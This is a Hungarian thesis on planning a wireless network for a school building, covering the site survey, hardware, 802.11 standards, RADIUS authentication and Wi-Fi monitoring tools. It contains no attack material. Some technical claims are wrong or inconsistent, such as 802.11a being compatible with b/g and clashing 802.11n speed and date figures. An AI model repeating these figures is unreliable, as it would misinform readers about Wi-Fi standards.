

Wifi infrastruktúra kialakítása Windows és Linux platformra

Diplomaterv sorszáma: 0606/2010

Oláh Róbert

Budapest
2011

Köszönetnyilvánítás

Ezúton szeretnék köszönetet mondani azoknak a személyeknek, akik hozzájárultak diplomamunkám elkészítéséhez. Peck Tibor tanár úrnak a diplomamunkám témájának felügyeletében nyújtott segítségét és konzulensi munkáját.

Ugyancsak köszönöm Cserni Csaba tanár Úr segítségét a munkámhoz nyújtott szakmai segítségnyújtását.

Végezetül, de nem utolsó sorban hálával tartozom szüleimnek a lelki támaszért és türelmükért, akik lehetővé tették számomra, főiskolai tanulmányaim elvégzését. A diplomairás ideje alatt sajnos édesapám elhunyt így az Ő emlékére is írom a főiskolai diplomamunkámat.

A szakdolgozat rövid témájának bemutatása

A vezeték nélküli technológia segítségével elérhetjük a szükséges információkat a világ bármely pontjából. Napjainkban egyre nagyobb igény van a számítástechnikai eszközeink hálózatba kapcsolására. Számítógépeink összekapcsolására az egyik hagyományos módszer hogy koaxiális vezetékkel összekötjük őket. Iskolákban vagy vállalatoknál végeláthatatlan kábelezéssel találkozhatunk, amelyet egy bizonyos idő után, ha tovább bővítjük vezetékes hálózatunkat nehezen lesz nyomon követhető a kábelezésünk, főleg ha a patch panelen a kábelezés kezelhetetlenné és áttekinthetetlené válik. Előfordulhat, hogy valamilyen okból a kábeles hálózat kiépítése nem lehetséges vagy csak részben. Ilyenek a múzeumok, előadó termek, vagy a mozgó terminál. Ma már egyre szélesebb körben használnak vezeték nélküli technológiát. A vezeték nélküli megoldások előnye hogy a hagyományos vezetékes hálózattal szemben nem igényli a kábelezés kiépítését, illetve a felhasználók számára a vezeték nélküli hálózat használata nagyobb mozgásteret ad.

A vezeték nélküli technológiák a felhasználók számára távolsági vezeték nélküli kapcsolatokat lehetővé tevő globális beszéd- és adathálózatoktól a kis hatótávolságú vezeték nélküli összeköttetésre optimalizált infravörös fény és rádiófrekvenciás technológiákig terjednek. Vezeték nélküli hálózati kommunikációban általában hordozható számítógépek, asztali számítógépek, kézi számítógépek, személyes digitális asszisztensek (PDA-k), mobiltelefonok, vesznek részt. A vezeték nélküli technológiáknak számos gyakorlati haszna van. A mobilfelhasználók például telefonjuk segítségével, elérhetik e-mailjeiket. A hordozható számítógéppel rendelkező utazók repülőtereken, vasúti pályaudvarokon és más nyilvános helyeken felállított bázisállomásokon keresztül, csatlakozni tudnak az internethez. A lehetőségek tárháza szinte kimeríthetetlen.

Kezdjük a legkézenfekvőbbel: a WLAN hálózaton megosztott szélessávú internetet pl.: egy lakás bármely pontján képesek vagyunk elérni WLAN képes PDA-val, olvashatjuk kedvenc oldalainkat, letölthetjük az e-mailt is. Összefoglalva a lehetőségek száma csupán az Access Point illetve a PDA WLAN rádiójának hatósugara szab határt. Ez utóbbit kiemelném, mert két WLAN képes eszköz csak akkor tud kommunikálni, ha mindkettő egymás hatósugarán belül helyezkedik el.

Diplomamunkámban egy WLAN hálózat kiépítését szeretném bemutatni egészen a tervezés és kivitelezéstől az üzembe helyezésig Windows és Linux platform alatt. A vezeték nélküli hálózat megtervezéséhez, az Edraw Network Diagram tervezőprogramot, az épület alaprajzainak elkészítéséhez viszont a Microsoft Visio programot fogom használni, amelynek segítségével fizikálisan is nyomon követhetővé kívánom tenni a kiépítés aktuális folyamatát a tervek bemutatása céljából, amelynek segítségével a kiépítés helyének tényezőit is szeretném jelölni. Diplomamunkámat több pontra választottam szét. A második pontban tárgyalni fogom a helyzet felmérést, amely alapján bemutatom a kiépíteni kívánt WLAN hálózat helyének jellemzőit, amely magába foglalja az alaprajz, valamint a külső és belső tényezőket, WLAN szabványokat) és a felhasznált eszközöket (software és hardware) szükségletek felmérését a vezeték nélküli hálózat kiépítéséhez. Ezután a hálózat előzetes tervezését emelném ki, amelyet az Edraw Network hálózattervező program segítségével reprezentálok a hálózat terv rajzát, amely tartalmazni fogja a tervezni kívánt hálózat működéséhez szükséges hardware elhelyezésének pontos helyét is. Ismertetni fogok egy házi WLAN antenna elkészítésének folyamatát is, de fontos szempont a WLAN egészségre gyakorolt hatása. A következő pont a biztonság szerepét kapta, amelynek fő szempontja a vezeték nélküli hálózatunk titkosítása. Ebben a részben tesztelni fogjuk hálózatunk védelmét egy törési kísérlettel reprezentálva, mint egy etikus hacker. Végül az utolsó részben kívánom leírni, a hogy WLAN hálózatunkat milyen továbbfejlesztési lehetőséggel lehetne bővíteni.

Célkitűzés

Diplomamunkám célja hogy a tervek alapján megtervezzem és megépítsem a hálózatot. WLAN hálózatunk védelme érdekében egy RADIUS szervert is szeretnék üzembe helyezni.

Indoklás

Azért választottam ezt a témát, mert érdeklődöm a vezeték nélküli technológia iránt, és szeretném jobban megismerni a benne rejlő lehetőségeket, és alkalmazásokat, vállalati környezetben.

Dolgozatomban a hálózat kiépítése és a szabványok, nyújtotta lehetőségek tanulmányozása során szerzett tapasztalataimat, szeretném bemutatni.

2. Helyzet felmérés és elemzés

1. ábra Tervezésem helyszíne

Tervezésem helyszíne egy általános iskola épülete. Az épület három szintből áll. Az alsó és a felső szinteken is tantermek vannak. A második emeleten azaz (Emelet2) helyezkedik el a Sulinet szekrény, amelyen keresztül kapcsolódik az iskola az internethez. Itt foglal helyet a számítástechnika terem is.

Az épület külső és belső tényezőit valamint az épület struktúráját és elektromos paramétereit is figyelembe kell vennünk a tervezés során.

Vezeték nélküli hálózat lehetővé teszi számunkra, hogy az, adott felhasználó az épületen belül bármely ponton hozzáférhessen a rendszer erőforrásaihoz. Ehhez az szükséges, hogy az adott területen (épületben) elektromos térrel való lefedettség megvalósuljon, amely a bázisállomások helyzetétől is függ. Az eszközök rádiófrekvenciás hatósugarát más tényezők is befolyásolhatják, mint a belső tér felépítésétől, a használni kívánt berendezések belső antennájának karakterisztikája valamint a jel terjedési útja, a teljesítményétől függően.

A vezeték nélküli kommunikációban az egyik legnagyobb akadály, amit le kell győzni a csillapítás, azaz a jel gyengülése. Befolyásolja a hatótávolságot, az átviteli sebességet is egyaránt. A csillapítás azonban nem csak ellenség. A mi esetünkben a csillapításnak köszönhetjük, hogy különböző pontokon különböző jelerősséget észlelünk, és erre később a rendszerünket építhetjük.

Ha az iskolának volna egy melléképülete, akkor biztosítanunk kellene az antennák közötti rálátást is. Az elérhető sebesség ebben az esetben is 54 Mbit/s lesz maximálisan. Az épület mivel három szintből áll, így szükséges Access Pointokat elhelyeznem a felső szinteken illetve az alsó szinten is, amelynek függvényében a felszerelt Access Point növeli a teljes rendszer, kapacitását és hatósugarát.

A jel, mint tudjuk akár szilárd akár nem szilárd közegen halad át, veszít a teljesítményéből. Ahogyan az adótól távolodunk illetve az egyéb akadályok, amely az adó és a vevő, útjában állnak szintén csökkentik a teljesítmény. Az eső, hó, és a magas páratartalom is befolyásolja a jel terjedését. Kezdetben ezzel nem kell számolnunk, de mivel jelenleg épületen belüli vezeték nélküli hálózatot építünk, fontosnak tartom megemlíteni a felhasználó által alkalmazni kívánt eszközvevő érzékenységét is. Az épületen belül számtalan akadály lehetséges, amely zavarótényező lehet a jelterjedés számára annak ellenére, hogy a rádióhullám sok dolgon képes áthatolni. Ezek közé sorolnám jelen esetben az iskola épületében található tárgyakat, amely kölcsönhatásban, lehet a WLAN vezeték nélküli hálózatunkra.

Itt gondolok az épület falaira, és a fémtárgyakra. Ebből következik, hogy nincs két egyforma hatósugár és lefedési terület sem. A lefedési terület minden egyes rendszerben más lehet. Vizsgálva az iskola épületét belülről szükségünk lesz jelerősítőkre. Épületen belül a vezeték nélküli rendszerek hatósugara több száz méterig terjedhet. Az adatátviteli sebesség 1 Mbit/s-tól - 54 Mbit/s-ig alakulhat. Ha viszont a nyitott területet vizsgáljuk, akkor a hatótávolság kb 150 m-re korlátozódhat. Ennek kiküszöbölésére alkalmaznunk kell Access Pointokat, amelynek segítségével a lefedettségi terület fizikai méretei kiterjeszthetők.

Szeretném megemlíteni, hogy a vezeték nélküli hálózatunk tulajdonképpen két fő szegmensre tagozódik. Az egyik a fentiekben már említett, Access Point amelynek feladata, hogy biztosítsa az összeköttetést a már kiépített vezetékes és a vezeték nélküli szegmens között.

Ez gondoskodik a hálózathoz kapcsolódó, számítógépek egymás köti kommunikációjáról is.

A rendszer előnye a mobilitás, valamint kiemelendő a skálázhatóság, amely annyit jelent, hogy a hálózat átkonfigurálása, újabb tagok felvétele nagyon egyszerűen megoldható egy vezeték nélküli kártya telepítésével. A tervezés első lépéseként szükséges az úgynevezett, RF tervezés, azaz egy kiépítendő rendszer esetén szükséges az optimális kihasználtság céljából a rádiófrekvenciás vizsgálat is. Azonban mielőtt üzembe helyezném a hálózati rendszert a terveknek megfelelően, helyszíni felmérést végeztem, hogy információt gyűjtssek a helyszíni rádiófrekvenciás telítettségről, és kihasználtságáról valamint a lefedendő terület rádiófrekvenciás interferencia zavartatást kiváltó tulajdonságairól. A helyszíni mérésre a Wisiwave Survery programot használtam, amely a fenti feladat elvégzésére megfelel. A következő oldalon szeretném bemutatni az épület alaprajzait.

2.1 Kiépítés helye (alaprjz, külső és belső tényezők Az épület alaprajza

2. ábra Földszinti alaprajz

3. ábra Emelet_1 alaprajz

4. ábra Iroda alaprajz

A vezeték nélküli hálózatok tervezésekkor négy alapkövetelményt vettem számításba.

- Skálázhatóság
- Magas rendelkezésre állás
- Menedzsmet (kezelhetőség)
- Együttműködés

A kiépíteni kívánt hálózatunkon a magas rendelkezésre állást a megfelelően megtervezett lefedettségi területtel tudjuk elérni, tartalék hozzáférési pontok azaz (Access Point) telepítésével. A rendszer jobb skálázhatósága érdekében több hozzáférési pontot kell telepítenünk a lefedettségi területre és bekonfiguráljuk az AP-kat terhelésmegosztásra. A helyszíni mérés alapján nem tapasztalható a helyszíni rádiófrekvenciás telítettség, egy WLAN hálózatot találtam a környéken, amely nem jelent interferenzazavarást WLAN hálózatra.

A WLAN hálózatunk menedzselésére szoftver és hardver kellékek teszik lehetővé, hogy központosított felügyeletre is lehetőségünk legyen, amelyek segítségével a lehetőségünk van a hálózatunk finomhangolására is. A hálózat kiépítésének igényei alapján legelőször felmértem a követelményeket, illetve a lehetséges felhasználók számát, az igényeket a leendő vezeték nélküli hálózattal kapcsolatban. Feltérképeztem az épületet, hogy a meghatározzam az Access Pointok elhelyezésének pontos helyét.

Az iskola három szintből áll. Emeletenként 4-5 hordozható eszköz használatára lehet számítani, és 25 felhasználóra. Az iskolában az órákra prezentációs előadással kívánják segíteni a gyerekek

tanulmányait a pedagógusok. Minden pedagógusnak az iskolarendelkezésre bocsátott személyre szólóan egy laptopot, munkájuk támogatottsága céljából.

A megfelelő sávszélesség biztosítása érdekében, az épület szintjein legalább 3 hozzáférési pontot kívánok kialakítani az épület adottságai miatt, így el tudjuk érni, hogy WLAN hálózatunk jól skálázhatóvá váljon, de ennek lévén egyben felkészülünk az eszközök, illetve a felhasználók számának, későbbi növekedésére is. Fontos szempontnak tartom a rendszere nézve a redundanciát.

Az állomások a 802.11a illetve a 802.11g szabvány szerinti csatolókkal, rendelkeznek. Az épületben kiépített vezetékes hálózat található, amelynek segítségével kialakítható a vezeték nélküli internet. Célom hogy a tantermekben is elérhetővé váljon az iskolában az internet.

A kiépített vezetékes hálózatban egy közháló által telepített úgynevezett „rack” szekrény található, amelyben Cisco System által gyártott hálózati eszközök találhatóak, amely jól skálázhatóságot és megbízhatóságot nyújt a rendszergazda számára. Az iskola minden dolgozójának engedélyezni kívánom a WLAN használatának hozzáférését, megfelelő titkosítással ellátva az illetéktelen használat ellen védve.

2.1.1 A kiépítéshez használt eszközök

Hálózatunk kiépítéséhez kapcsolókat is alkalmazunk, amely a vezetékes és vezeték nélküli hálózat közötti kapcsolatot fogja létrehozni. Az épület szintjein is több AP-t kívánok elhelyezni. Az AP-k 100 Mbit/s sebességgel kapcsolódnak. Az AP-k elnevezése azonos a helyük pozíciójával, hogy a későbbiekben könnyebben tudjuk elhárítani az esetleges hibát.

A kiépítéshez az alábbi eszközöket használtam fel.

5.

5. ábra Wlan router

Ez maga a router, amely megosztja az internet kapcsolatot a felhasználók között.

6. ábra UTP

6. ábra Wlan router

UTP6 kábel, amelyet a hálózat kiépítésében használtam fel.

7. ábra Wlan kártya

Az asztali gépekbe egy PCI-os WLAN kártya.

Hálózati kártya

-PC csatlakozók: PCI

- Támogatott WLAN szabványok:802.11b,802.11g

- Kódolás: WEP, WPA, WPA2

RJ 45 –ös dugó a szerelt kábelek végére.

8. ábra RJ 45 csatlakozó

Törés gátló az RJ45 csatlakozóra

9. ábra RJ 45 törés gátló

LINK SYS Wireless-G WET54G Access Point + Bridge

54Mbps adatátviteli sebesség- vezetékes hálózatok összekapcsolása- 2.4 Ghz rádiós adatátvitel- Weben keresztül konfigurálható- 128-bites WEP titkosítás- Külső térben 450m hatótáv (1Mbps)- RJ45 porton 10/100Mbps sebesség.

10. ábra Linksys Access Point

2.1.2 Wifi típusok szabványok

Az első WLAN-t az 1970-es években hozták létre a Hawaii Egyetem kutatói, amely az ALOHA nevet kapta. Ez a hálózat egy dedikált központi gépet használt, hogy a kliensek elérjék egymást. Az ALOHA, amellyel a vezetékes telefonvonalakat helyettesítették, még nagyban különbözött a mai WLAN-tól, mégis ez volt az első ilyen jellegű sikeres és valóban használható hálózat.

A mai WLAN szabványait a 1990-es években dolgozták ki, ezeket az IEEE 802.11 (WiFi) szabvány írja le.

Kezdetben a vállalatok a saját termékeire alkalmazta a technológiát. Így más gyártók eszközei nem működtek egymással. Megoldásként egy közös szabványt dolgoztak ki, amely a fent nevezett, 802.11-es elnevezést kapta, amelynek további változatai kerültek napvilágra. Elsőként a **WLAN** (Wireless Local Access Network), azaz a vezeték nélküli helyi hálózat fogalmát tisztázzuk. Azokat a vezeték nélküli megoldásokat nevezzük így összefoglaló néven, melyek néhány métertől legfeljebb néhány kilométerig terjedő távolságból lehetővé teszik, hogy egy LAN hálózat szolgáltatásait igénybe vehessük. A vezeték nélkül elért hálózat alapja lehet egy kiépített vezetékes hálózat is, ekkor csak az eszközünk kapcsolódik így. Lehet a teljes hálózat is vezetékmentes. Az első infrastruktúra alapú WLAN hálózatnak, az utóbbit ad hoc WLAN hálózatnak nevezik.

A kapcsolódás egy 1997-ben megalkotott szabvány szerint valósítjuk meg. Ez az IEEE 802.11 alapszabvány szélesebb körben is elfogadott első WLAN szabvány volt, ami 1 vagy 2 Mbit/s-os átviteli sebességű átvitelt tett lehetővé két pont között. A rádiófrekvenciás technológia a szabadon használható 2,4 GHz-es ISM sávot használta, és szórt spektrumú átviteli elven működött.

Az elméleti maximális sebesség megnövelésére született meg a ma leginkább elterjedt IEEE 802.11b szabvány 1999 végén. A más néven az IEEE 802.11-es szabvány az alapszabvány kiterjesztése, ami egy fejlettebb DSSS technológia használatának köszönhetően 11 Mbit/s-os sebesség elérését is lehetővé tette. Ebben a rendszerben az is lehetővé vált, hogy kedvezőtlenebb körülmények között a kapcsolat sebessége 5,5 Megabit/s, 2 Megabit/s vagy 1 Megabit/s.

Szabvány	Frekvencia	Maximális sebesség	Tipikus sebesség	Kiadás éve	Hatótávolság
802.11	2,4 Ghz	2 Mbps	1 Mbps	1997	
802.11a	5 Ghz	54 Mbps	25 Mbps	1999	~50 m
802.11b	2,4 Ghz	11 Mbps	6,5 Mbps	1999	~100m
802.11g	2,4 Ghz	54 Mbps	25 Mbps	2003	~100m
802.11n	2,4 Ghz	540 Mbps	200 Mbps	2006	~50m

11. ábra Wlan szabványok (a)

	2,4 GHz			5GHz		
	IEEE 802.11b	IEEE 802.11g	IEEE 802.11n	IEEE 802.11a	IEEE * 802.11h	IEEE 802.11n
Tip.hatótáv. beltérben	30m	30m	70m	30-50m	30-50m	70m
Tip.hatótáv. kültéren	100m	100m	250m	140m	400m	250m
Max. adóteljesítmény	100mW	100mW	100mW?	200mW	1000mW	1000mW
Bruttó adatátv. sebesség	11 Mbit/sec	54 Mbit/sec	248 Mbit/sec	54 Mbit/sec	54 Mbit/sec	248 Mbit/sec
Jellemző seb.	5,9 Mbit/s TCP 7,1 Mbit/s UDP	14,4-30,5 Mbit/sec	74 Mbit/sec	24,4-30,5 Mbit/sec	24,4-30,5 Mbit/sec	74 Mbit/sec
Átlapolás nélküli adatátv.	3	3	?	4	19	?
Csatorna választás	fix	fix	?	fix	automata	?
Rádió rendszer	DSSS	OFDM	OFDM	DFS	DFS	OFDM

12. ábra Wlan szabványok (b)

802.11 szabvány

Egy vezeték nélküli adatátviteli protokoll. Az OSI-modell két legalsó rétegét, a fizikai és az adatkapcsolati réteget definiálja. A WiFi védjeggyel ellátott Ethernet-kompatibilis rádiófrekvenciás, vezeték nélküli helyi hálózatok előírásait és ajánlásait magába foglaló szabványgyűjtemény. Sáv szélessége (Max): 2Mb/s. Használt frekvencia: 2,4GHz

802.11a (1999)

A 802.11b-vel egy időben definiált szabvány, amely viszont 5 GHz-es frekvencián már kezdettől fogva 54 Megabit/s elméleti sebességet tenne lehetővé, de valójában 20-25 Megabit/s tényleges csatornánkénti sebességre alkalmas, sebességtől függően 25-50 méteres hatósugáron belül. A használt frekvencia több országban tiltva volt, mivel például a légi irányítás használta. Kis hatótávolság, Multimédia alkalmazásokhoz ideális. Kompatibilis a b/g- szabvánnyal.

Sáv szélesség (max): 54Mb/s
Használt frekvencia: 5GHz

802.11b (1999)

Az WiFi alapdefinícióját tartalmazó szabvány. 2,4 GHz-es frekvencián, nagyjából 75 méteres távolságon belül 11 Megabit/s elméleti adatátviteli sebességet kínál. Sáv szélesség (max): 5,5Mb/s vagy 11Mb/s. A leginkább elterjedt rendszer.

802.11g (2003)

A 802.11b továbbfejlesztése, ugyanolyan frekvencián, de kisebb távolságon 54 Megabit/s elméleti adatátviteli sebességet ad. Jó tudni, hogy a „b” és a „g” szabványos készülékek egymással képesek a kommunikációra. A hatótávolság 100 méter. Frekvencia 2,4 GHz-es

802.11h

Az 802.11a kikerülésére tervezett szabvány. Az 5 GHz-es frekvencián módot ad olyan eszközök használatára, amelyek észlelik a többi, ugyanezen a frekvencián üzemelő berendezést, például radart, és képesek a kisugárzási teljesítmény csökkentésére, valamint az üzemi frekvencia elhangolására.

802.11x

Idetartozik a szolgáltatás minőségét meghatározó 802.11e szabvány, az elérési pontokat (Access Point) minősítő 802.11f szabvány és a titkosítást leíró 802.11i szabvány.

WiFi (Wireless Fidelity) embléma nem a szabvány neve, hanem egy termékre kapható tanúsítvány. Ezt a WiFi Alliance non profit szervezet adja 1999-től azoknak a termékeknek, amelyek valóban képesek gyártó függetlenül együttműködni egymással. A szövetségnek már néhány száz tagja van és ezernél is több termék kapta már meg ezt a minősítést. A 802.11 alapszabvány legújabb kiegészítésének köszönhetően több eszközt, számítógépet, mobiltelefont, médialejátszót és szórakoztatóelektronikai készüléket szerelhetnek fel az elméletileg akár 600 megabit/s adatátviteli sáv szélességet elérő rádióadókkal.

Az IEEE (Institute of Electrical and Electronics Engineers) megtette az első lépéseket az új WiFi szabvány kidolgozásért, mely a 802.11a felújítása lesz, és 80 vagy 160 MHz-es csatornákat használhat. Az elgondolás alapján a 802.11ac a módosításokkal elérheti a másodpercenkénti 1 gigabites adatátviteli sebességet, ami a 802.11n által kínált 300 megabit/másodperces értéknél jelentősen jobb. Ez az új technológia 2012 végén kerülhet véglegesítésre, így decemberében kerülhet sor.

A WLAN előnyei

Segítségével a nekünk tetsző helyről csatlakozhatunk a hálózatra. Napjainkban például sok kávézó is kínál vezeték nélküli internetet.

Egy WLAN hálózat telepítéséhez nem sokkal többre van szükség egy Access Pointnél, azonban a védelem szempontjából titkosított kapcsolaton, kommunikáljunk

A vezeték nélküli hálózatok egyszerűen ki tudják szolgálni a meg növekedett számú felhasználókat, anélkül, hogy újabb berendezéseket kellene vásárolni.

A vezeték nélküli eszközök ma már nem kerülnek sokkal többre vezetékes társainál, általuk időt és kábelezési költségeket takaríthatunk meg.

A WLAN hátrányai

A WLAN adók nem irányított sugárzást használnak, így az adó az információt minden irányba adja, mert nem tudja, hogy az általuk elérni kívánt hardver hol található. Ezeket a sugárzott csomagokat a hálózat hatókörén belül bárki elkaphatja. Speciális irányított antennákkal a vételi körzet megnövelhető, így a csomagvadászok akár a hálózat hatókörénél tízszer távolabbról is elérhetik az információkat. Amennyiben ezek nincsenek titkosítva, úgy bárki bizalmas adatokhoz juthat.

A megépített WiFi hálózatokat is befolyásolják az épületek. A maximális sebesség eléréséhez tíz méteres távlatokban kell gondolkodni, így hamar észrevehetjük, hogy egy hálózat, nem elég egy nagyobb épület lefedéséhez. Ezt a problémát úgynevezett ismétlők beiktatásával szokták megoldani. Egy más célra szánt technológia a WiMax segítségével, akár több 100 kilométeres távolságokat is áthidalhatunk.

Mint minden rádiófrekvenciás technológia, a WiFi jelek is ki vannak téve a zavaró tényezők széles körének, csakúgy, mint a környezet hatásainak (visszaverődés). Ennél a típusú jelnél a bonyolult modulációs technológiák (PSK - fázis kulcs moduláció, QAM – kvadratura amplitúdó moduláció) ezt még rosszabbá teszik.

Wifi típusok

Az „ad hoc”- mód

Az ad-hoc mód esetében az adatforgalom a kliensgépek között nem az AP segítségével történik, hanem a kliensek közvetlenül kommunikálnak egymással. Így nincs szükségünk központi egységre, de hátránya hogy kevés felhasználó kiszolgálását teszi lehetővé.

Ez azt jelenti, hogy esetünkre tekintve csupán néhány laptopot van lehetőségünk csatlakoztatni a hálózathoz.

Az infrastruktúra-mód

Az infrastruktúra-mód esetében, a kliensgépek egy AP-n keresztül tartják a kapcsolatot. Az AP-n kívül itt is szükség van arra, hogy a kliens gépekben wifi kártya legyen. Ez az eszköz rendszerint vezetékes és vezeték nélküli hálózatunk között teremt kapcsolatot, ez tulajdonképpen olyan mintha hídként funkcionálna. Azonban egy Access Point mint tudhatjuk több eszközzel is képes, arra hogy egyidejűleg kommunikáljon, amelynek számát az eszköz dokumentációjából tudhatjuk meg, de általában az AP-k elegendő számú kliens eszközt tudnak kiszolgálni. Azonban, lenne itt egy fontos szempont, amelyre figyelmünket kell fordítani. Minél több eszköz kommunikál, az AP-val annál jobban szűkül a sávszélesség és ennek eredményeképpen lassabb lesz a hálózatunk sebessége az eszközökön. A vezetékes hálózaton viszont elegendő sávszélesség marad több felhasználóknak pl.: online filmnézéshez. Amíg vezeték nélküli hálózat esetén kevesebb felhasználó juthat elegendő sávszélesség egy online film megtekintésére.

Root mód

Esetünkben a Root-módot alkalmazzuk. A „Root mód az jelenti, hogy az AP egy vezetékes hálózathoz kapcsolódik így lehetővé téve az átjárást a wifi képes klienseknek a hálózathoz, így biztosítva számukra a világháló elérését.

Repeater mód

Az AP-t alkalmazhatjuk Repeater módban is, amely azt jelenti, hogy az AP nem a vezetékes hálózathoz fog kapcsolódni, hanem az egy másik AP-hoz. Ebben az esetben az AP teljesítménye csökken. Ezt leginkább távolság áthidalására használják. Ha lehetséges csak végső esetben alkalmazzuk ezt a módszert.

2.1.3 A felhasznált eszközök jellemzése a kiépítéshez software és hardware szükségletek felmérése

Hardware szükségletek

A vezeték nélküli hálózat kialakításához az alábbi eszközöket használtam fel.

Belkin F5D7231-4P High-Speed Mode Wireless-G Router beépített USB nyomtató szerver

A vezeték nélküli kapcsolatot egy Belkin WLAN router fogja biztosítani az AP-kon keresztül az eszközök számára.

13. ábra Wlan router

Technikai részletek

- Hardver Platform: PC, Mac
- Kapcsolatok átvitel: Vezeték nélküli, vezetékes
- Hálózat Téma: Vezeték nélküli router
- Data Link Protokoll: Ethernet, Fast Ethernet, IEEE 802.11b, IEEE 802.11g
- Hálózati Transzport Protokoll: TCP / IP, AppleTalk, PPTP
- Hálózati adatátviteli sebesség: 125 megabit / másodperces

- Beépített 4-portos 10/100 Ethernet Switch
- Beépített NAT / SPI tűzfal
- Biztonság - 64 - és 128-bites WEP adattitkosítás, WPA TKIP és AES +
- Használata 802.11g érhet el akár 54Mbps
- Visszafelé kompatibilis a 802.11b berendezések adatátviteli sebesség akár 11 Mbit/s

UTP kábel a kiépítéshez. Az AP összekötése és csatlakoztatása a WLAN routerhez. A szükséges (RJ45) kábeleket saját magam szereltem.

14. ábra UTP kábel

Ezzel a TP-Link WN350GD-el nagy teljesítményű és gyors hálózatot alakíthatunk ki. Egy több irányú antennával szerelték fel ez a TP-Link PCI WN350GD kártyát, amely így 54 Mbit/s átviteli sebességet garantál. Ez a WN350GD kártya

WEP véd WPA adattitkosítási technológiával, működik, amely megvédi hálózatát az esetleges külső Kódolás: WEP/WPA/WPA2

15. ábra Wlan kártya

RJ 45-ös típusú csatlakozó. (8 tűs)

16. ábra RJ 45 csatlakozó

A hálózatunk biztonságos üzemelés érdekében Rádiusz szervert szeretnék felállítani, hogy a WLAN hálózatunkon növeljük a biztonságot. Rádiusz szervernek egy Core2Duo 2,0 GHz asztali számítógépet szerelek fel 2 db hálókártyával.

17. ábra Rádiusz szerver

18. ábra Rádiusz szerver elméleti működése

A Rádiusz szerver a hálózat védelmét biztosítja. Működési mechanizmusából tudhatjuk meg hogy a kliens csatlakozik egy már kiépített Access Point hoz. Az Access Point minden felhasználói kérést blokkol, majd a kliens ellenőrzi a Rádiusz szerver tanúsítványát. A Rádiusz szerver és a kliens származtatja a kulcsokat.(azt a kulcsot, amely szétszóródik a hálózatban). Ezután a Rádiusz szerver továbbküldi az unicast wep kulcsot az Access Pointnak, majd az Access Point továbbküldi az úgynevezett broadcast kulcsot titkosítva az unicast wep kulccsal együtt a kliensnek. Végül a kliens és az Access Point között, ha a hitelesítés sikeres a kommunikáció létrejön.

Software szükségletek:

A WLAN routerhez mellékelt programot telepítjük fel egy központi gépre. (szerver). A kliensekre, ha ez idáig még nem történt meg a belső integrált WLAN kártya driverét is. Számos segédprogramot találhatunk az interneten, amely közül az általam hasznosnak tekinthető programot szeretnék megemlíteni.

Diplomamunkámban két rendszerről írok. Windows és Linux operációs rendszerről. Ha a Windows mellett döntünk, akkor az alábbi programot is alkalmazhatjuk.

RADIUS test client 4.0 (Windows)

ClearBox Enterprise RADIUS Server 2.3 (Windows)

Abban az esetben, ha Linux operációs rendszer mellett döntünk a Rádiusz szerver felállításához, használhatjuk a FREE RADIUS programot.

Rádiusz szerver

A Rádiusz servert úgy kell konfigurálnunk, hogy minden egyes felhasználó saját jelszóval legyen ellátva és titkosított kapcsolaton, keresztül tudjon kapcsolódni a hálózathoz.

A Rádiusz szerver ismertebb nevén Remote Authentication Dial In User Service (RADIUS) Ez tulajdonképpen nem más, mint egy hálózati protokoll, amely hitelesítést (authentication) végez, a hálózathoz kapcsolódó számítógépeken. Rádiusz szervert az internet szolgáltatók használnak a felhasználók beazonosítására még a hálózatba való belépés előtt. A „RADIUS” határozza meg, hogy a felhasználók jogosultak a kért szolgáltatások használatára.

Windows esetén:

NetStumbler

A Network Stumbler egy hasznos WLAN kiegészítő program.

A NetStumbler a WLAN hatótávolságának mérésére szolgál. Segítségével meg tudjuk határozni a kibocsátott jel milyen távolságra, van a forrástól.

HotSpotDefenseKit (HotSpotDK)

A HotSpotDefenseKit vagy HotSpotDK egy hasznos eszköz, ami felügyeli a routert és riaszt, ha valaki engedély nélkül próbál csatlakozni vagy épp meghekkelni a hálózati hozzáférést.

AirSnare

Az ingyenes AirWare segítségével lenyomozhatunk minden hivatlan vendéget a WLAN-on. Figyelmeztet az ismeretlen MAC címek és a DHCP kérések esetén is.

NetSetMan

A NetSetMan alkalmazással, 2 kattintással megvizsgálhatja és elemezheti a hálózati beállításait. Azok számára, akik - főleg lappal- több hálózatot is igénybe vesznek, nagyon hasznos ez a program.

WirelessNetView

A Wireless NetView egy kis alkalmazás, ami a háttérben futva monitorozza az elérhető hálózatokat. Felsorolja minden talált WiFi SSID-jét, csatornáját, MAC címét és még sok minden mást.

HotSpotDefenseKit (HotSpotDK)

A HotSpotDefenseKit vagy HotSpotDK egy hasznos eszköz, ami felügyeli a routert és riaszt, ha valaki engedély nélkül próbál csatlakozni vagy épp meghekkelni a hálózati hozzáférést.

Free Rádiusz (Linux)

Egy ingyenes program Linux platformra, amely alkalmas egy hitelesítő szerver létrehozására.

2.3.4 Jelenlegi adottságok

Tantermi ellátottság:

- A maximálisan 30 fős férőhellyel kialakított osztályteremek száma tizenöt.
- Számítástechnikai tanterem jelenleg egy van.
- Háromszintes, húsz tantermes épület.
- 250 fő oktatására alkalmas
- Egy számítástechnikai tanterem Internet, LAN,
- Taniroda

Az épület téglapépületű. Az emeletet betonfödém választja el egymástól. A mérés során nem volt tapasztalható zavaró rádiófrekvenciás jelek. Egy WLAN hálózatot találtam a vizsgálat során. Az épületen belül az alsó szinten már igen gyenge jel fogható így a folszinten az AP-k elhelyezése indokolt, mert nem lesz elérhető az internet a kliensek számára a tanteremekben. Zavaró körülmények nem voltak tapasztalhatóak.

3. Előzetes tervezés

Tervrajz készítése aktív eszközök helyzete

19. ábra Földszint alaprajz hálózati terve (Ap 192.168.20.1-192.168.20.5)

20. ábra Földszint lefedettségi térkép (Ap 192.168.20.1-192.168.20.5) CAT 6 UTP

21. ábra Emelet_1 alaprajz hálózati terve (AP 192.168.20.6-192.168.20.9) CAT 6 UTP

22. ábra Emelet_1 lefedettségi térkép (AP 192.168.20.6-192.168.20.9) CAT 6 UTP

23. ábra Emelet 2 (Iroda) hálózati terve Cat 6

24. ábra Emelet2 (Iroda) Lefedettségi térkép (AP 192.168.20.10-192. 168.20.15) Cat6

Egy RF mérés vizsgálat segítségével meg kell határoznom, hogy a jelenleg elérhetőek-e más WLAN hálózatok a közelben illetve tapasztalunk zavaró körülményeket a területen. Az épület külső szemléje alapján elmondható hogy a jel terjedését a környező épületek és az iskola épületén belül nincs akadályozva, és a későbbi fejlesztéskor a kültéri lefedettség is kivitelezhető. A jelenlegi tervek alapján azt szeretném elérni, hogy az épületen belül a kliensek, kapcsolódjanak majd a kiépített WLAN hálózathoz.

